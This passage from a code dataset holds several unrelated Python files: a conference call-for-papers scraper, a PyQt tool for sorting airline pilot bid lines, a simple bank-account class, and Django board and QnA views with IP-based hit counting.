PyTypeChecker\n sb_samples = np.array(pool.map(func=func, iterable=[b for b in range(total_samples)]))\n\n return sb_samples\n# ===========================================================================================================\n","sub_path":"Utils/Distributions.py","file_name":"Distributions.py","file_ext":"py","file_size_in_byte":26269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"342145010","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport csv\nfrom serializers import Conference\nfrom datetime import datetime\nimport re\nimport urllib\n\n__author__ = 'lorenamesa'\n\nLANYARD_URL = 'http://lanyrd.com'\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\nROOT_DIR = os.path.abspath(os.path.join(BASE_DIR, os.pardir))\n\ndef main(args):\n\n calls_q = \"+\".join(word for word in args.get('calls'))\n\n response = requests.get(LANYARD_URL + '/calls/?q={0}'.format(calls_q))\n soup = BeautifulSoup(response.content)\n\n cfps = soup.find_all('li', class_='call-item call-list-open')\n\n conferences = {}\n\n for cfp in cfps:\n links = cfp.find_all('a')\n call_closes_indx = cfp.get_text().find('Call closes on')\n call_closes = cfp.get_text()[call_closes_indx:]\n data = {'name': links[1].get_text().encode('utf-8'),\n 'url': cfp.find_all('a')[1].attrs.get('href'),\n 'cfp': True,\n 'cfp_url': cfp.find_all('a')[0].attrs.get('href'),\n 'cfp_deadline': call_closes,\n 'location': cfp.find_all('a')[2].get_text() + ' ' + cfp.find_all('a')[3].get_text()}\n\n\n conferences[links[1].get_text()] = Conference(**data)\n\n topics_q = \"+\".join(word for word in args.get('topic'))\n\n response = requests.get(LANYARD_URL + '/topics/{0}/'.format(topics_q))\n soup = BeautifulSoup(response.content)\n\n upcoming_conf = soup.find_all('a', class_='summary url')\n\n for conf in upcoming_conf:\n data = {'name': conf.get_text().encode('utf-8'),\n 'url': LANYARD_URL + conf.attrs.get('href'),\n 'cfp': False}\n if data.get('name') not in conferences.keys():\n conferences[data.get('name')] = Conference(**data)\n\n for conf_name, conference in conferences.iteritems():\n lanyard_url = conference.url\n response = requests.get(lanyard_url)\n soup = BeautifulSoup(response.content)\n conf_url = soup.find('a', class_='icon url website')\n conference.url = conf_url.attrs.get('href')\n\n if soup.find('p', class_='date main-date date-range-day'):\n datestr = soup.find('p', class_='date main-date date-range-day').contents[1].attrs.get('title')\n else:\n datestr = soup.find('abbr', class_='dtstart').attrs.get('title')\n\n try:\n datestr = datetime.strptime(datestr, \"%B %d, %Y\")\n except ValueError as e:\n datestr = datetime.strptime(datestr, \"%b. %d, %Y\")\n\n conference.date = datestr\n\n if not conference.location:\n location = soup.find('p', class_='prominent-place').get_text()\n cleaned_location = re.sub(r'\\s+', ' ', location).encode('utf-8')\n conference.location = cleaned_location\n\n sorted_conferences = sorted(conferences.values(), key=lambda c: c.date)\n\n for conf in sorted_conferences:\n conf.date = conf.date.strftime(\"%m/%d/%y\")\n\n with open('{0}/data/conferences.csv'.format(ROOT_DIR), 'w') as list_conferences:\n headers = 'date,name,location,url,cfp,cfp_url,cfp_deadline,fa,fa_url,fa_deadline'.split(',')\n\n writer = csv.DictWriter(list_conferences, fieldnames=headers)\n writer.writeheader()\n\n for conf in sorted_conferences:\n writer.writerow(conf.__dict__)\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"build/lib/digest/conferences.py","file_name":"conferences.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"118094867","text":"#!/usr/bin/env python\n#\n#####################################################################\n# Copyright Shawn Downey #\n# 2016 #\n#####################################################################\n#\nimport re, codecs, sys, time, calendar\nfrom datetime import datetime\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QDialog\n# custom imports\nfrom bidgui import Ui_mainWindow, Ui_downloadDialog, Ui_resultsWindow\nimport download, messages, hashlib\nfrom os.path import abspath, exists, dirname\nfrom inspect import getsourcefile\n\n\n# from tkinter import *\n\n# ---gui-Classes\n\n# main window class\nclass mainWindow(QMainWindow, Ui_mainWindow):\n def __init__(self, nextmonth):\n QMainWindow.__init__(self)\n self.setupUi(self)\n self.nextmonth = nextmonth\n self.monthBox.setCurrentIndex(nextmonth)\n self.downloadButton.clicked.connect(self.downloadShowDialog)\n self.lineButton.clicked.connect(self.viewLine)\n self.seqButton.clicked.connect(self.viewSeq)\n self.sortButton.clicked.connect(self.sortLines)\n self.actionHelp.triggered.connect(lambda: messages.showMessage('Help', 0, 'Read the README included in the MasterBidder folder.'))\n self.actionAbout.triggered.connect(lambda: messages.showMessage('About', 0, 'MasterBidder\\n\\nVersion 0.1 (alpha)\\n\\nAll code and design work done by S. Dizzle.\\n\\n©2016'))\n self.action_Save_Results.triggered.connect(lambda: self.saveResults(self.results))\n self.action_Exit.triggered.connect(lambda: self.close())\n self.sortedmonth = None\n self.lines = None\n self.numoflines = 0\n self.seqs = None\n self.results = None\n self.sortProg.hide()\n #TODO: program prog bar\n\n def downloadShowDialog(self):\n base = self.baseBox.currentText()\n equip = self.equipBox.currentText()\n self.download = downloadDialog(base, equip)\n self.download.show()\n self.download.raise_()\n self.month = self.nextmonth + 1 # due to box index starting with 0\n self.month = calendar.month_abbr[self.month].upper()\n print('Preparing to download the latest', base, equip, 'bid packet.')\n\n def sortLines(self):\n month = self.monthBox.currentText()\n days = self.daysBox.value()\n credit = self.creditBox.value()\n start = self.startBox.value()\n end = self.endBox.value()\n carry = self.carryBox.isChecked()\n reserve = self.reserveBox.isChecked()\n daylist = ['MO', 'TU', 'WE', 'TH', 'FR', 'SA', 'SU']\n daysoff = []\n checkboxes = [self.moBox.isChecked(), self.tuBox.isChecked(), self.weBox.isChecked(), self.thBox.isChecked(),\n self.frBox.isChecked(), self.saBox.isChecked(), self.suBox.isChecked()]\n\n for i, n in enumerate(checkboxes):\n if n == False:\n daysoff.append(daylist[i])\n\n\n if self.lines and (self.sortedmonth == month):\n self.results = SortLines(month, days, credit, start, end, carry, reserve, daysoff, self.lines,\n self.numoflines, self.seqs)\n else:\n\n (self.lines, self.numoflines, self.seqs) = DeconstructLines(month,self)\n #TODO: add error catch\n self.results = SortLines(month, days, credit, start, end, carry, reserve, daysoff, self.lines,\n self.numoflines, self.seqs)\n self.sortedmonth = month\n\n self.newWin = resultsWindow(self.results)\n self.newWin.showMaximized()\n\n def viewLine(self):\n line = self.lineBox.value()\n month = self.monthBox.currentText()\n results = ViewLines(line, month,self.lines,self.numoflines,self)\n self.newWin = resultsWindow(results)\n self.newWin.showMaximized()\n\n def viewSeq(self):\n seq = str(self.seqBox.value())\n month = self.monthBox.currentText()\n results = ViewSequence(seq, month,self.seqs,self)\n self.newWin = resultsWindow(results)\n self.newWin.showMaximized()\n\n def saveResults(self,results):\n if self.sortedmonth and results:\n directory = dirname(abspath(getsourcefile(lambda:0))) + '/'\n resultspath = directory + self.sortedmonth + 'results.txt'\n with codecs.open(resultspath, \"w\", \"utf-8\") as resultsdump:\n resultsdump.write(results)\n resultsdump.close()\n messagestr = 'The results have been saved to ' + self.sortedmonth + 'results.txt'\n messages.showMessage('Results Saved!', 1, messagestr)\n else:\n messages.showMessage('Results error!', 2, 'There was a problem saving the results. Are you sure you sorted the packet?')\n\n def updateProgress(self):\n value = self.sortProg.value()\n value = value + 10\n self.sortProg.setValue(value)\n QApplication.processEvents()\n\n# download dialog class\nclass downloadDialog(QDialog, Ui_downloadDialog):\n def __init__(self, base, equip):\n QDialog.__init__(self)\n self.setupUi(self)\n self.base = base\n self.equip = equip\n self.downloadButton.clicked.connect(lambda: self.download(base, equip))\n\n def download(self, base, equip):\n self.downloadButton.setDisabled(True)\n user = self.loginID.text()\n passwrd = self.loginPass.text()\n\n self.updateProgress('...loading web request')\n\n response = download.logIn(user, passwrd, base, equip, self)\n\n if response:\n if response == 'error':\n messages.showMessage('Unexpected error.', 2, 'An unexpected error occurred.\\n\\nTry again.')\n elif response == 'login':\n messages.showMessage('Login incorrect.',2,'You have entered the wrong login credentials.\\n\\nTry again.')\n else:\n response = response.text\n header = response[0:25]\n print(response)\n month = ['JANUARY', 'FEBRUARY', 'MARCH', 'APRIL', 'MAY', 'JUNE', 'JULY', 'AUGUST', 'SEPTEMBER',\n 'OCTOBER',\n 'NOVEMBER', 'DECEMBER']\n for x, y in enumerate(month):\n answer = header.find(y)\n if answer > -1:\n answer = y\n break\n month = answer\n answer = answer[0:3]\n answer = ''.join(answer)\n answer = answer.upper()\n print(answer)\n\n self.updateProgress('writing bid data to file...')\n\n directory = dirname(abspath(getsourcefile(lambda:0))) + '/'\n bidpath = directory + answer + \".txt\"\n with codecs.open(bidpath, \"w\", \"utf-8\") as bidfile:\n bidfile.write(response)\n bidfile.close()\n self.updateProgress('file saved...')\n stringthing = 'The %s bid packet was successfully downloaded!' % (month + ' ' + base + ' ' + equip)\n messages.showMessage('Success!', 1, stringthing)\n\n self.downloadButton.setEnabled(True)\n self.close()\n\n def updateProgress(self, status):\n value = self.progressBar.value()\n value = value + 10\n self.progressBar.setValue(value)\n self.downloadStatus.setText(status)\n QApplication.processEvents()\n\n\nclass resultsWindow(QDialog, Ui_resultsWindow):\n def __init__(self, results):\n QDialog.__init__(self)\n self.setupUi(self)\n self.results = results\n self.resultsView.setText(results)\n\n\n# Maybe this will have some function in the future\nclass Packet(object):\n def __init__(self, bidmonth, lines):\n self.bidmonth = bidmonth\n self.lines = lines\n\n\n# Class-ifys line information for attribute lookups\nclass Line(Packet):\n def __init__(self, linenumber, blkvalue, crdvalue, daysoff, tafb, carryover, seqinfo, seqnums, seqstarts, seqends,\n lineinfo):\n self.linenumber = linenumber\n self.blkvalue = blkvalue\n self.crdvalue = crdvalue\n self.daysoff = daysoff\n self.tafb = tafb\n self.carryover = carryover\n self.seqinfo = seqinfo\n self.seqnums = seqnums\n self.seqstarts = seqstarts\n self.seqends = seqends\n self.lineinfo = lineinfo\n\n\nclass Seq(Packet):\n def __init__(self, seqnum, seqdays, seq):\n self.seqnum = seqnum\n self.seqdays = seqdays\n self.seq = seq\n\n\n# Does all the prep work\ndef DeconstructLines(bidmonth,window):\n window.sortProg.setValue(0)\n window.sortProg.show()\n timebefore = time.time()\n # constructs bidpaths\n directory = dirname(abspath(getsourcefile(lambda:0))) + '/'\n bidpath = directory + bidmonth + \".txt\"\n xpath = directory + bidmonth + \"x.txt\" # fixed bid packet\n ypath = directory + bidmonth + \"y.txt\" # sequence file\n zpath = directory + bidmonth + \"z.txt\" # line file\n delimeter = \"-------------------------------------------------------------------------------------------------------------------------------------\\n\"\n # prints bidpath to the console\n print(\"The bid file should be located at: \" + bidpath)\n window.updateProgress() #1\n # see if bidpath exists, then open using Windows codec and re-write as UTF text\n if exists(bidpath):\n with codecs.open(bidpath, \"r\", \"cp1250\") as bidfile:\n with codecs.open(xpath, \"w\", \"utf-8\") as xfile:\n for line in bidfile:\n if not '------------------------' in line: #issue: sometimes found in sequences\n xfile.write(line)\n else:\n xfile.write(delimeter)\n xfile.close()\n bidfile.close()\n # open new UTF bid file and read the contents\n window.updateProgress() #2\n with codecs.open(xpath, \"r\", encoding='utf-8', errors='ignore') as xfile:\n bidcontent = xfile.read()\n # find the lines\n #TODO: FIX\n seqgrabber = delimeter + '.*' + delimeter\n results = re.search(seqgrabber, bidcontent, re.DOTALL)\n results = results.group(0)\n # turns results back to string after stripping extraneous text\n # cleans up text for processing & removes more extraneous:\n results = re.sub(r'\\S\\S\\S\\s*PILOT\\s*LINES\\s*DOMICILE:\\s*\\S\\S\\S','',results)\n results = re.sub(r'^\\s*$','',results)\n\n xfile.close()\n # print(results) # remove for debugging\n\n # creates new data file for processing\n window.updateProgress() #3\n with codecs.open(zpath, \"w\", encoding='utf-8') as zfile:\n zfile.write(results)\n zfile.write(delimeter)\n zfile.close()\n\n window.updateProgress() #4\n\n with codecs.open(zpath, \"r\", encoding='utf-8') as zfile:\n contents = zfile.read()\n linenumber = re.findall('BLK NO. (\\d\\d\\d) ', contents, re.DOTALL)\n blkvalue = re.findall('BLK. +(\\d+.\\d\\d)', contents, re.DOTALL)\n crdvalue = re.findall('CRD. (\\d\\d.\\d\\d)', contents, re.DOTALL)\n daysoff = re.findall('DYS OFF +(\\d+)', contents, re.DOTALL)\n tafb = re.findall('TAFB +(\\d+.\\d\\d)', contents, re.DOTALL)\n carryover = re.findall('C/O +(\\d+.\\d\\d)', contents, re.DOTALL)\n seqreg = r'(?=' + delimeter + r'(.*?)' + delimeter + ')'\n lineinfo = re.findall(seqreg, contents, re.DOTALL) # gathers each individual line for processing\n\n\n # removes formatting error blank lines\n for i in lineinfo:\n if 'BLK' not in str(i):\n lineinfo.remove(i)\n\n # processes the sequences and groups them according to each bid line\n\n seqinfo = []\n x = len(lineinfo)\n for y in range(0, x):\n seqstuff = re.findall('(\\d\\d\\d)= (\\d\\d\\d\\d)/(\\d\\d\\d\\d)/\\d\\d\\d\\d', str(lineinfo[y]), re.DOTALL)\n seqinfo.append(seqstuff)\n\n listed = [linenumber, blkvalue, crdvalue, daysoff, tafb, carryover, seqinfo]\n linenums = listed[0]\n linenums = [int(i) for i in linenums]\n blkvals = listed[1]\n blkvals = [float(i) for i in blkvals]\n crdvals = listed[2]\n crdvals = [float(i) for i in crdvals]\n offs = listed[3]\n offs = [int(i) for i in offs]\n aways = listed[4]\n aways = [float(i) for i in aways]\n overs = listed[5]\n overs = [float(i) for i in overs]\n seqinfs = listed[6]\n # turns all seq data into an integer so it can be compared later\n seqinfs = [[[int(j) for j in i] for i in h] for h in seqinfs]\n seqnums = [[[x for ind, x in enumerate(y) if ind == 0] for y in z] for z in seqinfs]\n seqnums = [[x.pop() for x in y] for y in seqnums]\n # turn seqnums back to string so they can be compared to seqnums in Seq object later\n seqnums = [[str(i) for i in n] for n in seqnums]\n seqstarts = [[[x for ind, x in enumerate(y) if ind == 1] for y in z] for z in seqinfs]\n seqstarts = [[x.pop() for x in y] for y in seqstarts]\n seqends = [[[x for ind, x in enumerate(y) if ind == 2] for y in z] for z in seqinfs]\n seqends = [[x.pop() for x in y] for y in seqends]\n\n\n #print all the data\n print(len(linenums), 'lines', linenums)\n print(len(blkvals), 'blk vals', blkvals)\n print(len(crdvals), 'crd vals', crdvals)\n print(len(offs), 'days off', offs)\n print(len(aways), 'tafb', aways)\n print(len(overs), 'carrys', overs)\n print(len(seqinfs), 'seqinfo', seqinfs)\n print(len(seqnums),'seqnums', seqnums)\n print(len(seqstarts),'seqstarts', seqstarts)\n print(len(seqends), 'seqends', seqends)\n\n\n window.updateProgress() #5\n # Stuff line data into list of Line classes for reference by attributes\n lines = []\n i = len(linenums)\n for n in range(0, i):\n lines.append(\n Line(linenums[n], blkvals[n], crdvals[n], offs[n], aways[n], overs[n], seqinfs[n], seqnums[n],\n seqstarts[n], seqends[n], lineinfo[n]))\n\n packet = Packet(bidmonth, lines)\n numoflines = len(lines)\n zfile.close()\n\n with codecs.open(xpath, \"r\", encoding='utf-8', errors='ignore') as xfile:\n seqcontent = xfile.read()\n xfile.close()\n\n window.updateProgress() #6\n\n with codecs.open(ypath, \"w\", \"utf-8\", errors='ignore') as yfile:\n yfile.write(seqcontent)\n yfile.close()\n\n window.updateProgress() #7\n\n with codecs.open(ypath, \"r\", encoding='utf-8', errors='ignore') as yfile:\n seqcontent = yfile.read()\n results = re.findall('\\d\\d\\d\\d - \\S\\S\\S (.*)',\n seqcontent, re.DOTALL)\n results = '\\r'.join(results)\n # turns results back to string after stripping extraneous text\n seqdelimeter = '========================================================================'\n header = r'DAY DH FLTN DPS-ARS DEPL ARRL BLKT GRNT EQP TBLK TCRD TPAY DUTY LAYO'\n results = re.sub(r'\\w+ PILOTS PAIRINGS \\w+ \\d+ - \\w+ \\d+, \\d+ - \\w+', '', results)\n results = re.sub(header, '', results)\n results = re.sub(r'^\\s*$', '', results, flags=re.MULTILINE)\n results = re.sub(seqdelimeter, '', results)\n\n window.updateProgress() # 8\n\n with codecs.open(ypath, \"w\", encoding='utf-8') as yfile:\n yfile.write(results)\n yfile.close()\n\n\n # find, split, and store the sequence information\n seqreg = r'(\\d\\d\\d\\d\\d.*?LDGS:\\s+\\d+)'\n seq = re.findall(seqreg, results, flags=re.DOTALL)\n\n # find seqnum\n seqnums = []\n for x in seq:\n seqnum = re.findall(r'\\d\\d(\\d\\d\\d)', x)\n seqnum = seqnum[0]\n seqnums.append(seqnum)\n\n # find seq days worked\n seqdays = []\n for x in seq:\n seqdayfinder = re.findall(r'(\\bMO\\b|\\bTU\\b|\\bWE\\b|\\bTH\\b|\\bFR\\b|\\bSA\\b|\\bSU\\b){1}', x)\n seqdays.append(seqdayfinder)\n\n # when seqdays are found they can be returned duplicated, this sends to a function to remove dups\n for i, n in enumerate(seqdays):\n seqdays[i] = removedups(seqdays[i])\n\n window.updateProgress() #9\n # Stuff sequence data into list of Seq classes for reference by attributes\n seqs = []\n i = len(seq)\n for n in range(0, i):\n seqs.append(Seq(seqnums[n], seqdays[n], seq[n]))\n\n timeafter = time.time()\n timetodo = str(timeafter - timebefore)\n print(\"The lines took: \" + timetodo + \" seconds to organize. \\n\\n\")\n window.updateProgress() #10\n window.sortProg.hide()\n return lines, numoflines, seqs\n else:\n print(bidmonth, 'packet does not exist!')\n window.sortProg.setValue(0)\n window.sortProg.hide()\n return None, 0, None\n # returns lines & number of lines for function use\n\n\ndef SortLines(month, numofdays, amtofval, startcom, endcom, carry, reserve, daysoff, lines, numoflines, seqs):\n\n if numoflines == 0:\n return \"No lines found! \\nDoes the %s bid packet exist?\\n \\nIf so, there is a formatting error preventing MasterBidder from sorting the lines!\\n\" % month\n\n else:\n\n print('Searching through', numoflines, 'lines...')\n\n # create list for results\n answer = []\n delete = []\n final = []\n # iterate over the lines to find the answer\n\n\n # find days off desired\n for x in range(0, numoflines):\n if (lines[x].daysoff >= numofdays):\n answer.append(lines[x])\n stat_off = len(answer)\n\n # find credit value desired\n for y, x in enumerate(answer):\n z = getattr(x, 'crdvalue')\n if z < amtofval:\n delete.append(x)\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n\n delete = []\n stat_val = len(answer)\n\n # find sequence start times desired\n for y, x in enumerate(answer):\n z = getattr(x, 'seqstarts')\n for i in z:\n if i < startcom:\n delete.append(x)\n break\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n\n delete = []\n stat_start = len(answer)\n\n # find sequence end times desired\n for y, x in enumerate(answer):\n z = getattr(x, 'seqends')\n for i in z:\n if i > endcom:\n delete.append(x)\n break\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n stat_end = len(answer)\n\n delete = []\n\n # allow or disallow carryover\n\n if carry == False:\n for y, x in enumerate(answer):\n z = getattr(x, 'carryover')\n if z > 0:\n delete.append(x)\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n stat_carry = len(answer)\n\n delete = []\n\n if reserve == False:\n for y, x in enumerate(answer):\n z = getattr(x, 'seqnums')\n if z == []:\n delete.append(x)\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n stat_reserve = len(answer)\n\n for y, linesleft in enumerate(answer):\n groupSeqs = getattr(linesleft, 'seqnums')\n for n, currentSeq in enumerate(groupSeqs):\n for a, b in enumerate(seqs):\n if b.seqnum == currentSeq:\n for i in daysoff:\n if i in b.seqdays:\n delete.append(linesleft)\n\n for i, x in enumerate(delete):\n if x in answer:\n answer.remove(x)\n stat_days = len(answer)\n # if day off is found in list of days, append 'x' to 'delete'\n\n\n # print results\n\n\n printer=[]\n for i in answer:\n printer.append(i.linenumber)\n\n print(printer,'\\n')\n\n for i in answer:\n print('Line Number :', i.linenumber)\n print('Days Off :', i.daysoff)\n print('Credit Value :' , i.crdvalue)\n print('Sequences :', i.seqnums)\n print('Start Times :', i.seqstarts)\n print('End Times :', i.seqends)\n print('Carry Over :', i.carryover)\n print(i.lineinfo)\n print('\\n')\n\n stat_off = str(stat_off) + ' lines have at least ' + str(numofdays) + ' days off. '\n stat_val = str(stat_val) + ' lines also are worth at least ' + str(amtofval) + ' hours.'\n stat_start = str(stat_start) + ' lines also start after ' + str(startcom)\n stat_end = str(stat_end) + ' lines also end before ' + str(endcom)\n stat_carry = str(stat_carry) + ' lines also meet the carry over criteria: ' + str(carry)\n stat_reserve = str(stat_reserve) + ' lines also meet the reserve criteria: ' + str(reserve)\n stat_days = str(stat_days) + ' lines also meet the days off criteria: ' + str(daysoff)\n\n stat_block = []\n results = []\n stats = [stat_off,stat_val,stat_start,stat_end,stat_carry,stat_reserve,stat_days]\n\n for i in stats:\n stat_block.append(i)\n\n for i in answer:\n results.append(i.lineinfo)\n delimeter = '\\n----------------------------------------------------------------------------------------------------------\\n'\n results = delimeter.join(results )\n stats_block = '\\n'.join(stat_block)\n results = stats_block + delimeter + results\n if results == \"\":\n results = \"No lines found that match your criteria!\\n\\nChange your parameters and try again.\"\n\n return results\n\n\ndef ViewLines(line, month, lines, numoflines,window):\n\n if numoflines == 0:\n window.sortProg.setValue(0)\n window.sortProg.hide()\n return \"No lines found! \\nDid you sort the lines yet?\\n \\nDoes the bid packet exist?\\n\"\n\n responses = []\n for x, y in enumerate(lines):\n z = getattr(y, 'linenumber')\n if line == z:\n responses.append(y.lineinfo)\n if responses == []:\n responses = \"Did not find any matches.\"\n else:\n responses = ''.join(responses)\n return responses\n\n\ndef ViewSequence(seq, month,seqs,window):\n\n if seqs == [] or seqs == None:\n window.sortProg.setValue(0)\n window.sortProg.hide()\n return \"No sequences found! \\nDid you sort the lines yet?\\n \\nDoes the bid packet exist?\\n\"\n\n responses = []\n for x, y in enumerate(seqs):\n z = getattr(y, 'seqnum')\n if seq == z:\n responses.append(y.seq)\n if responses == []:\n responses = \"Did not find any matches.\"\n else:\n responses = ''.join(responses)\n return responses\n\n\n# for removing duplicate entries in lists\ndef removedups(input):\n output = []\n for x in input:\n if x not in output:\n output.append(x)\n return output\n\n\n# for returning integer for yes/no\ndef integermaker(input):\n if input == 'y':\n output = int(1)\n elif input == 'n':\n output = int(0)\n else:\n sys.exit()\n return output\n\n\nif __name__ == '__main__':\n currentmonth = datetime.now()\n currentmonth = currentmonth.month\n print(currentmonth)\n secretcode = 'envoysux' + str(currentmonth)\n secretcode = str.encode(secretcode)\n secretcode = hashlib.sha256(secretcode).hexdigest()\n directory = dirname(abspath(getsourcefile(lambda:0))) + '/'\n keyloc = directory + 'key.txt'\n print(keyloc)\n\n\n\n\n\n # GUI BUILDING\n app = QApplication(sys.argv)\n if currentmonth == 12:\n currentmonth = 0\n main = mainWindow(currentmonth)\n main.show()\n\n '''\n if exists(keyloc):\n with codecs.open(keyloc, \"r\", \"utf-8\") as keyfile:\n key = keyfile.readline().strip()\n keyfile.close()\n if key == secretcode:\n print('key valid!')\n else:\n messages.showMessage('Key required!', 3,\n 'You need a product key to use this app!\\n\\nThe keyfile was found, but the key is incorrect.')\n sys.exit()\n else:\n messages.showMessage('Key required!',3,'You need a product key to use this app!\\n\\nCould not find keyfile.')\n sys.exit()\n '''\n\n\n sys.exit(app.exec_())\n","sub_path":"bid.py","file_name":"bid.py","file_ext":"py","file_size_in_byte":25770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"393942695","text":"import sys\n\nclass bank:\n\tAccount_no=0\n\tremaining_amount=0\n\tdef __init__(self,initial_amount):\n\t\tbank.Account_no=bank.Account_no+1\n\t\tprint(\"Account no is:{}\".format(bank.Account_no))\n\t\t\n\t\tself.initial_amount=initial_amount\n\t\tprint(\"Initial Amount is:{}\".format(self.initial_amount))\t\n\n\tdef Withdraw(self,initial_amount,withdraw_amount):\n\t\t\n\t\tif(withdraw_amount < initial_amount):\n\t\n\t\t\tbank.remaining_amount=(initial_amount - withdraw_amount)\n\t\t\treturn bank.remaining_amount\n\n\t\telse:\n\t\t\tprint(\"Balance is low..!\")\n\t\n\tdef Deposit(self,deposit_amount):\n\t\t\n\t\treturn (bank.remaining_amount+deposit_amount)\n\t\t\n\tdef Check_Balance():\n\t\treturn bank.remaining_amount\n\ndef main():\n\n\twhile True:\n\n\t\tprint(\"1.Create Account.\")\n\t\tprint(\"2.Withdraw.\")\n\t\tprint(\"3.Deposit.\")\n\t\tprint(\"4.Check Balance.\")\n\t\tprint(\"0.Exit.\")\n\n\n\t\tch=eval(input(\"Enter the choice:\"))\n\n\t\tif ch==1:\n\t\t\tb=bank(10000)\n\t\t\tprint(\"\\n\")\n\t\telif ch==2:\n\t\t\tc=b.Withdraw(10000,5000)\n\t\t\tprint(\"\\nWithdraw amount is {}\".format(c))\n\t\n\t\telif ch==3:\n\t\t\ttotal=b.Deposit(3000)\n\t\t\tprint(\"\\nTotal Amount is :{}\".format(total))\n\t\n\t\telif ch==4:\n\t\t\tamount=bank.Check_Balance()\n\t\t\tprint(\"\\n Amount is:{}\".format(amount))\n\n\t\telif ch==0:\n\t\t\tsys.exit()\nif __name__=='__main__':\n\tmain()\n","sub_path":"oops/Bank_account.py","file_name":"Bank_account.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190736482","text":"from django.shortcuts import render, get_object_or_404\r\nfrom django.views.generic import TemplateView, ListView, DetailView\r\nfrom staff.models import *\r\nfrom .forms import *\r\nfrom django.shortcuts import redirect\r\nfrom django.utils import timezone\r\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger # 6.2소이 - 페이지네이션\r\nfrom ipaddr import client_ip # 6.4 소이 - ip조회수\r\n\r\n\r\n# 기부단체 목록\r\n# 7.18 소이 - 변경\r\nclass DonationLV(ListView):\r\n model = DonationOrg\r\n template_name = \"staff/donationOrg.html\"\r\n context_object_name = 'donations'\r\n donations = DonationOrg.objects.all()\r\n\r\n\r\n# 공지사항 목록\r\nclass PostLV(ListView):\r\n model = Board\r\n template_name = \"staff/board_list.html\"\r\n context_object_name = 'posts'\r\n paginate_by = 5\r\n posts = Board.objects.all()\r\n\r\n # 카테고리 목록 추가\r\n def get_context_data(self, **kwargs):\r\n context = super(PostLV, self).get_context_data(**kwargs)\r\n categories = Category.objects.all()\r\n context['categories'] = categories\r\n return context\r\n\r\n\r\n# 공지사항 상세\r\n# class PostDV(DetailView):\r\n# model = Board\r\n# template_name = \"staff/board_detail.html\"\r\n# paginate_by = 2\r\n# context_object_name = 'post'\r\n\r\n# ip주소 조회수\r\ndef post_ip(request, pk):\r\n post = get_object_or_404(Board, pk=pk)\r\n # posts = Board.objects.all()\r\n ip = client_ip(request)\r\n\r\n try:\r\n # ip주소와 게시글 번호로 기록을 조회함\r\n hits = HitCount.objects.get(ip=ip, post=post)\r\n except Exception as e:\r\n # 처음 게시글을 조회한 경우엔 조회 기록이 없음\r\n print(e)\r\n hits = HitCount.objects.create(ip=ip, post_id=post.id)\r\n Board.objects.filter(pk=pk).update(hits=post.hits + 1)\r\n hits.save()\r\n # 상세화면에서 조회수가 바로 바뀌지 않아서 강제로 출력 조회수 +1 시킴\r\n post.hits = post.hits + 1\r\n else:\r\n # 조회 기록은 있으나, 날짜가 다른 경우\r\n if not hits.date == timezone.now().date():\r\n # 테스트할 때 사용\r\n # if not hits.date == timezone.now():\r\n Board.objects.filter(pk=pk).update(hits=post.hits + 1)\r\n hits.date = timezone.now()\r\n hits.save()\r\n post.hits = post.hits+1\r\n # 날짜가 같은 경우\r\n else:\r\n print(str(ip) + ' has already hit this post.\\n\\n')\r\n return render(request, 'staff/board_detail.html', {'post': post})\r\n\r\n\r\n# def post_detail(request, pk):\r\n# post = get_object_or_404(Board, pk=pk)\r\n# return render(request, 'staff/board_detail.html',{'post':post})\r\n\r\n# 공지사항 수정\r\ndef post_edit(request, pk):\r\n post = get_object_or_404(Board, pk=pk)\r\n if request.method == \"POST\":\r\n form = BoardForm(request.POST, instance=post)\r\n if form.is_valid():\r\n post = form.save(commit=False)\r\n post.user = request.user\r\n post.save()\r\n return redirect('staff:board_detail', pk=post.pk)\r\n else:\r\n form = BoardForm(instance=post)\r\n return render(request, 'staff/board_edit.html', {'form': form})\r\n\r\n\r\n# 공지사항 삭제\r\ndef post_remove(request, pk):\r\n post = get_object_or_404(Board, pk=pk)\r\n post.delete()\r\n return redirect('staff:board_list')\r\n\r\n\r\n# 카테고리 필터링\r\ndef post_filter(request, pk):\r\n posts = Board.objects.filter(category_id=pk)\r\n categories = Category.objects.all()\r\n return render(request, 'staff/board_list.html', {'posts': posts, 'categories': categories})\r\n\r\n\r\n# QnA 두번째 게시판\r\ndef qnaView(request):\r\n advertisings = Advertising.objects.all().order_by('?')\r\n advertising1 = advertisings[0]\r\n advertising2 = advertisings[1]\r\n qnas = QnA.objects.all()\r\n # 6.2 소이 - 페이지네이션\r\n paginator = Paginator(qnas, 5)\r\n\r\n page = request.GET.get('page')\r\n try:\r\n qnas = paginator.page(page)\r\n except PageNotAnInteger:\r\n # If page is not an integer, deliver first page.\r\n qnas = paginator.page(1)\r\n except EmptyPage:\r\n # If page is out of range (e.g. 9999), deliver last page of results.\r\n qnas = paginator.page(paginator.num_pages)\r\n\r\n return render(request, 'staff/QnA.html', {'qnas': qnas, 'advertising1':advertising1, 'advertising2':advertising2})\r\n\r\n\r\n# QnA 삭제\r\ndef qna_remove(request, pk):\r\n qna = get_object_or_404(QnA, pk=pk)\r\n qna.delete()\r\n return redirect('staff:qna')\r\n\r\n\r\n# 질문 수정\r\ndef q_edit(request, pk):\r\n qna = get_object_or_404(QnA, pk=pk)\r\n if request.method == \"POST\":\r\n form = QForm(request.POST, instance=qna)\r\n if form.is_valid():\r\n qna = form.save(commit=False)\r\n qna.user = request.user\r\n qna.save()\r\n return redirect('staff:qna')\r\n 